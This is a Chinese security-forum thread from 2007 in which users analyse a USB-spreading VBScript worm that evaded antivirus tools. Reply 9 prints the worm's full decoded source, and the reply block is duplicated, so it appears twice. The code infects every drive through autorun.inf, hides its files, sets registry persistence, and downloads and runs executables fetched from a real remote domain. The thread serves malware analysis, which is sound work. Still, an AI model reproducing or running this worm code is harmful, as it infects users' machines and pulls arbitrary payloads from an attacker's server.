[讨论]一VBS病毒过IS和微点了,无语...-软件逆向-看雪-安全社区|安全招聘|kanxue.com

[讨论]一VBS病毒过IS和微点了,无语...

发表于: 2007-10-18 09:32 23875

[讨论]一VBS病毒过IS和微点了,无语...

sudami

2007-10-18 09:32

23875

【讨论】一VBS病毒过IS和微点了,无语...

前言:
昨天U盘被借,回来一插,马上中毒;
微点虽然有反应,但马上自己就出错,提示内存不可写(汗~,微点被过了)

原来是一个VBS病毒,生成了不址一个进程,其中一个隐藏了,过了IS,用SSDT Recover 问题依旧

描述:
病毒主文件名: `.vbs

⑴ 生成了2个autorun.inf文件: C:\WINDOWS\SYSTEM32\autorun.inf 和 C:\autorun.inf
偶把这2个文件删了, 内容中还包含了病毒作者的信息(大概是): 纪念自己大学毕业,制作时间07/8/1

⑵ 任务管理器中有一个WScript.exe进程不断的消失出现,CPU使用率居高不下. IS进程中显示的出来,但结束后马上又出现.
SSDT Recover 恢复前显示隐藏进程为1,SSDT Recover 恢复后显示隐藏进程为0;

但这个进程还是隐藏的,通过对比IS的进程表发现的(前后进程数量没有变化,进程表中也没有红色的进程)
此时发现IS被过了...

⑶ 病毒释放2个驱动到C:\WINDOWS\SYSTEM32\Drivers 目录下,其中一个驱动被隐藏,IS无法找到该驱动文件,另一个驱动本来也是隐藏着的,偶用 SSDT Recover 恢复后,查找到了它,名称为:Swk0217.sys,打包上来了,希望大叔们逆下这驱动;
还有个驱动文件在IS的文件栏中也查看不到,显然是文件隐藏. 驱动名为:2692406.sys (可能是病毒作者的QQ号,faint...)

⑷ 隐藏进程不断检测自己,同时也检测 "隐藏受保护的操作系统文件(推荐)" 一栏,发现被改,马上改回来
(U盘病毒的常用伎俩...)

后续:

偶对VBS病毒不是很了解,打包上来帮分析下啊~
MS过IS和微点的病毒还不是很多的...

---------------------------------------------------------------------------

在同学电脑上实验了下,终于早到autorun.inf文件了,内容如下:

daxian4.0
[AutoRun]
daxianbiyeliunian 2007.8.1
open=WScript.exe .\`.vbs
4.0
shell\open=打开(&O)
2007-9-13 15:59:34
shell\open\Command=WScript.exe .\`.vbs
shell\open\Default=1
`.vbe

[培训]《安卓高级研修班(网课)》月薪三万计划，掌握调试、分析还原ollvm、vmp的方法，定制art虚拟机自动化脱壳的方法

上传的附件：

Snap2.gif （4.44kb，1789次下载）
Snap3.gif （4.74kb，1868次下载）
Snap4.gif （6.10kb，1770次下载）
过IS的VBS病毒.rar （5.81kb，366次下载）

收藏・7

免费・0

支持

最新回复 (39) 1 2 ▶
思弦雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 27 粉丝 0 关注私信	思弦 2 楼这么强,期待高人出手,我来学习 2007-10-18 09:51 0
笨笨雄雪币： 846 活跃值： (221) 能力值： (RANK：570 ) 在线值：发帖 212 回帖 3620 粉丝 21 关注私信	笨笨雄 14 3 楼一开始看不到放密码的位置。。下载看看。。 2007-10-18 09:53 0
whtyy 雪币： 242 活跃值： (14) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 356 粉丝 0 关注私信	whtyy 1 4 楼 HOOK KeServiceDescriptorTable里的ZwQuerySystemInformation 无趣 2007-10-18 11:05 0
godisagirl 雪币： 110 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 81 粉丝 0 关注私信	godisagirl 5 楼 xxxxxxxxxxxxxx 2007-10-18 11:18 0
sudami 雪币： 709 活跃值： (2420) 能力值： ( LV12，RANK：1010 ) 在线值：发帖 71 回帖 1582 粉丝 64 关注私信	sudami 25 6 楼恢复了SSDT还是隐藏着啊... 2007-10-18 11:24 0
whtyy 雪币： 242 活跃值： (14) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 356 粉丝 0 关注私信	whtyy 1 7 楼 http://whois.domaintools.com/dinghui123.cn Domain Name: dinghui123.cn ROID: 20070521s10001s44532186-cn Domain Status: ok Registrant Organization: 个人 Registrant Name: 鼎慧这些中马的家伙 2007-10-18 11:37 0
kmyc 雪币： 235 活跃值： (17) 能力值： ( LV9，RANK：170 ) 在线值：发帖 11 回帖 76 粉丝 1 关注私信	kmyc 4 8 楼其实我一直觉得xp的“自动播放功能”很没意思，插个移动硬盘还要把所有的文件扫描一遍，简直就是浪费我的时间。所以我从来都是“关闭自动播放功能”的 2007-10-18 11:56 0
无聊的菜鸟雪币： 622 活跃值： (294) 能力值： ( LV13，RANK：410 ) 在线值：发帖 59 回帖 561 粉丝 5 关注私信	无聊的菜鸟 9 9 楼 VBs内的内容。。。 ver="4.0" tile="daxian"&ver about="daxianbiyeliunian 2007.8.1" fromurl="http://hgz.dinghui123.cn/wanasp" on error resume next dim wsh dim WshShell Set Wsh =CreateObject("WScript.Shell") set WshShell=Wscript.CreateObject("Wscript.Shell") Set FSO = CreateObject("Scripting.FileSystemObject") set dir = FSO.GetSpecialFolder(1) Set dc = FSO.Drives ouwnname=Wscript.ScriptName mulu=left(Wscript.ScriptFullName,len(Wscript.ScriptFullName)-len(Wscript.ScriptName)) if mulu=dir&"\" then sys=true For Each d In dc if mulu=d&"\" then opendisk=WshShell.Run("explorer "&d,3,false) Next if not sys=true then wscript.sleep 2000 set y=getobject("winmgmts:\\.\root\cimv2") set x=y.execquery("select * from win32_process where name='wscript.exe'") i=0 for each j in x i=i+1 next if i>1 then wscript.quit end if yincang if readtxt(mulu&"autorun.inf",1)<>tile then buildinf ver,now,ouwnname end If copyexe=readtxt(mulu&"autorun.inf",5)&".exe" randomize sjs=int(Rnd * (10-1+1)) + 1 If fso.FileExists(mulu©exe) and sjs<>3 then if sys=true then WshShell.run mulu©exe Else if left((readtxt("c:\date.bin",1)),9)<>left(now,9) then shuxing "c:\date.bin",0 set bin = fso.CreateTextFile("c:\date.bin", True) bin.writeline now bin.close shuxing "c:\date.bin",2+4 Ldownver=readtxt(mulu&"autorun.inf",5) downfile mulu&"temp.txt",fromurl,0 Set OpenFile = FSO.OpenTextFile(mulu&"temp.txt", 1) nouse = OpenFile.ReadLine downis = OpenFile.ReadLine downver = OpenFile.ReadLine downname = downver&".exe" downfrom = OpenFile.ReadLine vbsver = OpenFile.ReadLine vbsname = OpenFile.ReadLine vbsurl = OpenFile.ReadLine guanggao= OpenFile.ReadLine OpenFile.Close FSO.DeleteFile(mulu&"temp.txt") if downis=1 then If vbsver<>ver then downfile mulu&vbsname,vbsurl,1 wscript.quit end if If downver<>Ldownver or not fso.FileExists(mulu©exe) then shuxing mulu©exe,0 If fso.FileExists(mulu©exe) then FSO.DeleteFile(mulu©exe) downfile mulu&downname,downfrom,0 buildinf downver,now,guanggao copyexe=downname end if end if end if End If if sys=true then If not fso.FileExists(mulu&"`.ini") then copyvbs dir&"\`.ini" end if ganran() WshShell.run mulu&ouwnname else shuxing mulu&ouwnname,2+4 copyvbs dir&"\`.vbe" copyvbs dir&"\`.ini" CopyFile mulu&"autorun.inf",dir&"\autorun.inf" CopyFile mulu©exe,dir&"\"©exe shuxing dir&"\"©exe,2+4 if mulu<>"C:\" then copyvbs "c:\`.vbs" CopyFile mulu&"autorun.inf","c:\autorun.inf" CopyFile mulu©exe,"c:\"©exe end if zhuce WshShell.run dir&"\`.vbe" end if function copyfile(file,where) shuxing where,0 if fso.FileExists(file) then FSO.CopyFile file,where,True end function function copyvbs(where) shuxing where,0 set self=fso.opentextfile(mulu&ouwnname,1) vbscopy=self.readall self.close set vbs = fso.CreateTextFile(where, True) vbs.write vbscopy vbs.close shuxing where,2+4 end function function zhuce() RegPath="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\run\" Type_Name="REG_SZ" Key_Name="explorer" Key_Data="`.vbe" WshShell.RegWrite RegPath&Key_Name,Key_Data,Type_Name end function function yincang() RegPath="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\" Type_Name="REG_DWORD" Key_Name="ShowSuperHidden" Key_Data="00000000" WshShell.RegWrite RegPath&Key_Name,Key_Data,Type_Name end function function buildinf(exever,exename,adv) shuxing mulu&"autorun.inf",0 set ini = fso.CreateTextFile(mulu&"autorun.inf", True) ini.writeline tile ini.writeline "[AutoRun]" ini.writeline about ini.writeline "open=WScript.exe .\`.vbs" ini.writeline exever ini.writeline "shell\open=打开(&O)" ini.writeline exename ini.writeline "shell\open\Command=WScript.exe .\`.vbs" ini.writeline "shell\open\Default=1" ini.writeline adv ini.close shuxing mulu&"autorun.inf",1+2+4 end function function readtxt(where,line) if fso.FileExists(where) then Set readfile = fso.OpenTextFile(where, 1) i=0 do while i<line i=i+1 strLine = readfile.ReadLine loop readfile.Close readtxt=strLine else readtxt="not_found" end if end function function shuxing(file,change) if fso.FileExists(file) then Set oFile = FSO.GetFile(file) oFile.Attributes = change Set oFile = Nothing end if end function function downfile(localfile,urlfile,runfile) shuxing localfile,0 iLocal = LCase(localfile) iRemote = LCase(urlfile) 'if 1=2 then Wscript.echo "Impossible!" Set xPost = CreateObject("Microsoft.XMLHTTP") 'if 1=2 then Wscript.echo "Impossible!" xPost.Open "get",iRemote,0 'if 1=2 then Wscript.echo "Impossible!" xPost.Send() 'if 1=2 then Wscript.echo "Impossible!" Set sGet = CreateObject("ADODB.Stream") 'if 1=2 then Wscript.echo "Impossible!" sGet.Mode = 3 'if 1=2 then Wscript.echo "Impossible!" sGet.Type = 1 'if 1=2 then Wscript.echo "Impossible!" sGet.Open() 'if 1=2 then Wscript.echo "Impossible!" sGet.Write(xPost.responseBody) 'if 1=2 then Wscript.echo "Impossible!" sGet.SaveToFile iLocal,2 'if 1=2 then Wscript.echo "Impossible!" shuxing localfile,2+4 if runfile=1 then Wsh.run iLocal end function function ganran() do For Each d In dc If d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then If fso.FileExists(d&"\`.vbs") and fso.FileExists(d&"\autorun.inf") then if readtxt(d&"\autorun.inf",1)<>tile then CopyFile dir&"\autorun.inf",d&"\autorun.inf" CopyFile dir&"\"©exe,d&"\"©exe CopyFile dir&"\`.ini",d&"\`.vbs" end if else CopyFile dir&"\autorun.inf",d&"\autorun.inf" CopyFile dir&"\"©exe,d&"\"©exe CopyFile dir&"\`.ini",d&"\`.vbs" end if End If next wscript.sleep 2000 loop end function 2007-10-18 14:07 0
sudami 雪币： 709 活跃值： (2420) 能力值： ( LV12，RANK：1010 ) 在线值：发帖 71 回帖 1582 粉丝 64 关注私信	sudami 25 10 楼能大致读懂,但里面MS没有释放驱动和隐藏进程的代码... 2007-10-18 16:19 0
boywhp 雪币： 1233 活跃值： (907) 能力值： ( LV12，RANK：750 ) 在线值：发帖 98 回帖 595 粉丝 26 关注私信	boywhp 12 11 楼跟驱动没有什么关系，就是一个vbs脚本病毒啊我用微点就搞定了，它只是把隐藏系统文件选上了 2007-10-22 11:04 0
无聊的菜鸟雪币： 622 活跃值： (294) 能力值： ( LV13，RANK：410 ) 在线值：发帖 59 回帖 561 粉丝 5 关注私信	无聊的菜鸟 9 12 楼这个解码出来的文件已经是病毒感染了你系统之后遗留下来的文件，真正感染你机器的原病毒中应该有下载驱动并载入驱动的过程。 2007-10-22 19:16 0
vrowang123 雪币： 257 活跃值： (56) 能力值： ( LV5，RANK：60 ) 在线值：发帖 75 回帖 586 粉丝 0 关注私信	vrowang123 1 13 楼 ring0满天飞。。。。。。 2007-10-23 10:12 0
fullx 雪币： 249 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 29 粉丝 1 关注私信	fullx 14 楼好奇。。下来看看。 2007-10-28 12:28 0
kleverx 雪币： 204 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 12 粉丝 0 关注私信	kleverx 15 楼 mark~~ 2007-11-15 14:38 0
方舟雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	方舟 16 楼楼上可以加些注释不想研究下 2007-12-5 00:55 0
bobkey 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	bobkey 17 楼同意，没什么特别的地方 2007-12-14 20:01 0
lvkeqin 雪币： 150 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 14 粉丝 0 关注私信	lvkeqin 18 楼学习慢慢看! 2007-12-19 00:44 0
孤雪GIRL 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 25 粉丝 0 关注私信	孤雪GIRL 19 楼压缩包似乎有密码A～ 2007-12-31 00:16 0
魔幻水晶雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 50 粉丝 0 关注私信	魔幻水晶 20 楼汗，还好我有耐心看完了帖子……不然就郁闷了…… 2007-12-31 02:03 0
Winker 雪币： 796 活跃值： (370) 能力值： ( LV9，RANK：380 ) 在线值：发帖 133 回帖 1127 粉丝 18 关注私信	Winker 8 21 楼 sys文件漫天飞．．．以前是exe倒还米啥怕的．．． 2007-12-31 09:00 0
xinger 雪币： 209 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 2 粉丝 0 关注私信	xinger 22 楼我也碰到了和楼主同感期待高手 2007-12-31 18:56 0
tornodo 雪币： 437 活跃值： (110) 能力值： ( LV5，RANK：70 ) 在线值：发帖 7 回帖 232 粉丝 0 关注私信	tornodo 1 23 楼强人啊。学习了。 2008-1-8 23:00 0
combojiang 雪币： 321 活跃值： (271) 能力值： ( LV13，RANK：1050 ) 在线值：发帖 44 回帖 765 粉丝 55 关注私信	combojiang 26 24 楼好，这个附件的sys，我给逆向下。等回头，我回帖到编程部分的rootkit里面。 2008-1-8 23:33 0
shenzhu 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 18 粉丝 0 关注私信	shenzhu 25 楼我上次也中这个了让 NOD给干了 . 还以为没啥货 . . 原来这么强 ? 早知道研究研究. 2008-2-4 07:04 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

sudami

发帖

1582

回帖

1010

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (39) 1 2 ▶
思弦雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 27 粉丝 0 关注私信	思弦 2 楼这么强,期待高人出手,我来学习 2007-10-18 09:51 0
笨笨雄雪币： 846 活跃值： (221) 能力值： (RANK：570 ) 在线值：发帖 212 回帖 3620 粉丝 21 关注私信	笨笨雄 14 3 楼一开始看不到放密码的位置。。下载看看。。 2007-10-18 09:53 0
whtyy 雪币： 242 活跃值： (14) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 356 粉丝 0 关注私信	whtyy 1 4 楼 HOOK KeServiceDescriptorTable里的ZwQuerySystemInformation 无趣 2007-10-18 11:05 0
godisagirl 雪币： 110 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 81 粉丝 0 关注私信	godisagirl 5 楼 xxxxxxxxxxxxxx 2007-10-18 11:18 0
sudami 雪币： 709 活跃值： (2420) 能力值： ( LV12，RANK：1010 ) 在线值：发帖 71 回帖 1582 粉丝 64 关注私信	sudami 25 6 楼恢复了SSDT还是隐藏着啊... 2007-10-18 11:24 0
whtyy 雪币： 242 活跃值： (14) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 356 粉丝 0 关注私信	whtyy 1 7 楼 http://whois.domaintools.com/dinghui123.cn Domain Name: dinghui123.cn ROID: 20070521s10001s44532186-cn Domain Status: ok Registrant Organization: 个人 Registrant Name: 鼎慧这些中马的家伙 2007-10-18 11:37 0
kmyc 雪币： 235 活跃值： (17) 能力值： ( LV9，RANK：170 ) 在线值：发帖 11 回帖 76 粉丝 1 关注私信	kmyc 4 8 楼其实我一直觉得xp的“自动播放功能”很没意思，插个移动硬盘还要把所有的文件扫描一遍，简直就是浪费我的时间。所以我从来都是“关闭自动播放功能”的 2007-10-18 11:56 0
无聊的菜鸟雪币： 622 活跃值： (294) 能力值： ( LV13，RANK：410 ) 在线值：发帖 59 回帖 561 粉丝 5 关注私信	无聊的菜鸟 9 9 楼 VBs内的内容。。。 ver="4.0" tile="daxian"&ver about="daxianbiyeliunian 2007.8.1" fromurl="http://hgz.dinghui123.cn/wanasp" on error resume next dim wsh dim WshShell Set Wsh =CreateObject("WScript.Shell") set WshShell=Wscript.CreateObject("Wscript.Shell") Set FSO = CreateObject("Scripting.FileSystemObject") set dir = FSO.GetSpecialFolder(1) Set dc = FSO.Drives ouwnname=Wscript.ScriptName mulu=left(Wscript.ScriptFullName,len(Wscript.ScriptFullName)-len(Wscript.ScriptName)) if mulu=dir&"\" then sys=true For Each d In dc if mulu=d&"\" then opendisk=WshShell.Run("explorer "&d,3,false) Next if not sys=true then wscript.sleep 2000 set y=getobject("winmgmts:\\.\root\cimv2") set x=y.execquery("select * from win32_process where name='wscript.exe'") i=0 for each j in x i=i+1 next if i>1 then wscript.quit end if yincang if readtxt(mulu&"autorun.inf",1)<>tile then buildinf ver,now,ouwnname end If copyexe=readtxt(mulu&"autorun.inf",5)&".exe" randomize sjs=int(Rnd * (10-1+1)) + 1 If fso.FileExists(mulu©exe) and sjs<>3 then if sys=true then WshShell.run mulu©exe Else if left((readtxt("c:\date.bin",1)),9)<>left(now,9) then shuxing "c:\date.bin",0 set bin = fso.CreateTextFile("c:\date.bin", True) bin.writeline now bin.close shuxing "c:\date.bin",2+4 Ldownver=readtxt(mulu&"autorun.inf",5) downfile mulu&"temp.txt",fromurl,0 Set OpenFile = FSO.OpenTextFile(mulu&"temp.txt", 1) nouse = OpenFile.ReadLine downis = OpenFile.ReadLine downver = OpenFile.ReadLine downname = downver&".exe" downfrom = OpenFile.ReadLine vbsver = OpenFile.ReadLine vbsname = OpenFile.ReadLine vbsurl = OpenFile.ReadLine guanggao= OpenFile.ReadLine OpenFile.Close FSO.DeleteFile(mulu&"temp.txt") if downis=1 then If vbsver<>ver then downfile mulu&vbsname,vbsurl,1 wscript.quit end if If downver<>Ldownver or not fso.FileExists(mulu©exe) then shuxing mulu©exe,0 If fso.FileExists(mulu©exe) then FSO.DeleteFile(mulu©exe) downfile mulu&downname,downfrom,0 buildinf downver,now,guanggao copyexe=downname end if end if end if End If if sys=true then If not fso.FileExists(mulu&"`.ini") then copyvbs dir&"\`.ini" end if ganran() WshShell.run mulu&ouwnname else shuxing mulu&ouwnname,2+4 copyvbs dir&"\`.vbe" copyvbs dir&"\`.ini" CopyFile mulu&"autorun.inf",dir&"\autorun.inf" CopyFile mulu©exe,dir&"\"©exe shuxing dir&"\"©exe,2+4 if mulu<>"C:\" then copyvbs "c:\`.vbs" CopyFile mulu&"autorun.inf","c:\autorun.inf" CopyFile mulu©exe,"c:\"©exe end if zhuce WshShell.run dir&"\`.vbe" end if function copyfile(file,where) shuxing where,0 if fso.FileExists(file) then FSO.CopyFile file,where,True end function function copyvbs(where) shuxing where,0 set self=fso.opentextfile(mulu&ouwnname,1) vbscopy=self.readall self.close set vbs = fso.CreateTextFile(where, True) vbs.write vbscopy vbs.close shuxing where,2+4 end function function zhuce() RegPath="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\run\" Type_Name="REG_SZ" Key_Name="explorer" Key_Data="`.vbe" WshShell.RegWrite RegPath&Key_Name,Key_Data,Type_Name end function function yincang() RegPath="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\" Type_Name="REG_DWORD" Key_Name="ShowSuperHidden" Key_Data="00000000" WshShell.RegWrite RegPath&Key_Name,Key_Data,Type_Name end function function buildinf(exever,exename,adv) shuxing mulu&"autorun.inf",0 set ini = fso.CreateTextFile(mulu&"autorun.inf", True) ini.writeline tile ini.writeline "[AutoRun]" ini.writeline about ini.writeline "open=WScript.exe .\`.vbs" ini.writeline exever ini.writeline "shell\open=打开(&O)" ini.writeline exename ini.writeline "shell\open\Command=WScript.exe .\`.vbs" ini.writeline "shell\open\Default=1" ini.writeline adv ini.close shuxing mulu&"autorun.inf",1+2+4 end function function readtxt(where,line) if fso.FileExists(where) then Set readfile = fso.OpenTextFile(where, 1) i=0 do while i<line i=i+1 strLine = readfile.ReadLine loop readfile.Close readtxt=strLine else readtxt="not_found" end if end function function shuxing(file,change) if fso.FileExists(file) then Set oFile = FSO.GetFile(file) oFile.Attributes = change Set oFile = Nothing end if end function function downfile(localfile,urlfile,runfile) shuxing localfile,0 iLocal = LCase(localfile) iRemote = LCase(urlfile) 'if 1=2 then Wscript.echo "Impossible!" Set xPost = CreateObject("Microsoft.XMLHTTP") 'if 1=2 then Wscript.echo "Impossible!" xPost.Open "get",iRemote,0 'if 1=2 then Wscript.echo "Impossible!" xPost.Send() 'if 1=2 then Wscript.echo "Impossible!" Set sGet = CreateObject("ADODB.Stream") 'if 1=2 then Wscript.echo "Impossible!" sGet.Mode = 3 'if 1=2 then Wscript.echo "Impossible!" sGet.Type = 1 'if 1=2 then Wscript.echo "Impossible!" sGet.Open() 'if 1=2 then Wscript.echo "Impossible!" sGet.Write(xPost.responseBody) 'if 1=2 then Wscript.echo "Impossible!" sGet.SaveToFile iLocal,2 'if 1=2 then Wscript.echo "Impossible!" shuxing localfile,2+4 if runfile=1 then Wsh.run iLocal end function function ganran() do For Each d In dc If d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then If fso.FileExists(d&"\`.vbs") and fso.FileExists(d&"\autorun.inf") then if readtxt(d&"\autorun.inf",1)<>tile then CopyFile dir&"\autorun.inf",d&"\autorun.inf" CopyFile dir&"\"©exe,d&"\"©exe CopyFile dir&"\`.ini",d&"\`.vbs" end if else CopyFile dir&"\autorun.inf",d&"\autorun.inf" CopyFile dir&"\"©exe,d&"\"©exe CopyFile dir&"\`.ini",d&"\`.vbs" end if End If next wscript.sleep 2000 loop end function 2007-10-18 14:07 0
sudami 雪币： 709 活跃值： (2420) 能力值： ( LV12，RANK：1010 ) 在线值：发帖 71 回帖 1582 粉丝 64 关注私信	sudami 25 10 楼能大致读懂,但里面MS没有释放驱动和隐藏进程的代码... 2007-10-18 16:19 0
boywhp 雪币： 1233 活跃值： (907) 能力值： ( LV12，RANK：750 ) 在线值：发帖 98 回帖 595 粉丝 26 关注私信	boywhp 12 11 楼跟驱动没有什么关系，就是一个vbs脚本病毒啊我用微点就搞定了，它只是把隐藏系统文件选上了 2007-10-22 11:04 0
无聊的菜鸟雪币： 622 活跃值： (294) 能力值： ( LV13，RANK：410 ) 在线值：发帖 59 回帖 561 粉丝 5 关注私信	无聊的菜鸟 9 12 楼这个解码出来的文件已经是病毒感染了你系统之后遗留下来的文件，真正感染你机器的原病毒中应该有下载驱动并载入驱动的过程。 2007-10-22 19:16 0
vrowang123 雪币： 257 活跃值： (56) 能力值： ( LV5，RANK：60 ) 在线值：发帖 75 回帖 586 粉丝 0 关注私信	vrowang123 1 13 楼 ring0满天飞。。。。。。 2007-10-23 10:12 0
fullx 雪币： 249 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 29 粉丝 1 关注私信	fullx 14 楼好奇。。下来看看。 2007-10-28 12:28 0
kleverx 雪币： 204 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 12 粉丝 0 关注私信	kleverx 15 楼 mark~~ 2007-11-15 14:38 0
方舟雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	方舟 16 楼楼上可以加些注释不想研究下 2007-12-5 00:55 0
bobkey 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	bobkey 17 楼同意，没什么特别的地方 2007-12-14 20:01 0
lvkeqin 雪币： 150 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 14 粉丝 0 关注私信	lvkeqin 18 楼学习慢慢看! 2007-12-19 00:44 0
孤雪GIRL 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 25 粉丝 0 关注私信	孤雪GIRL 19 楼压缩包似乎有密码A～ 2007-12-31 00:16 0
魔幻水晶雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 50 粉丝 0 关注私信	魔幻水晶 20 楼汗，还好我有耐心看完了帖子……不然就郁闷了…… 2007-12-31 02:03 0
Winker 雪币： 796 活跃值： (370) 能力值： ( LV9，RANK：380 ) 在线值：发帖 133 回帖 1127 粉丝 18 关注私信	Winker 8 21 楼 sys文件漫天飞．．．以前是exe倒还米啥怕的．．． 2007-12-31 09:00 0
xinger 雪币： 209 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 2 粉丝 0 关注私信	xinger 22 楼我也碰到了和楼主同感期待高手 2007-12-31 18:56 0
tornodo 雪币： 437 活跃值： (110) 能力值： ( LV5，RANK：70 ) 在线值：发帖 7 回帖 232 粉丝 0 关注私信	tornodo 1 23 楼强人啊。学习了。 2008-1-8 23:00 0
combojiang 雪币： 321 活跃值： (271) 能力值： ( LV13，RANK：1050 ) 在线值：发帖 44 回帖 765 粉丝 55 关注私信	combojiang 26 24 楼好，这个附件的sys，我给逆向下。等回头，我回帖到编程部分的rootkit里面。 2008-1-8 23:33 0
shenzhu 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 18 粉丝 0 关注私信	shenzhu 25 楼我上次也中这个了让 NOD给干了 . 还以为没啥货 . . 原来这么强 ? 早知道研究研究. 2008-2-4 07:04 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复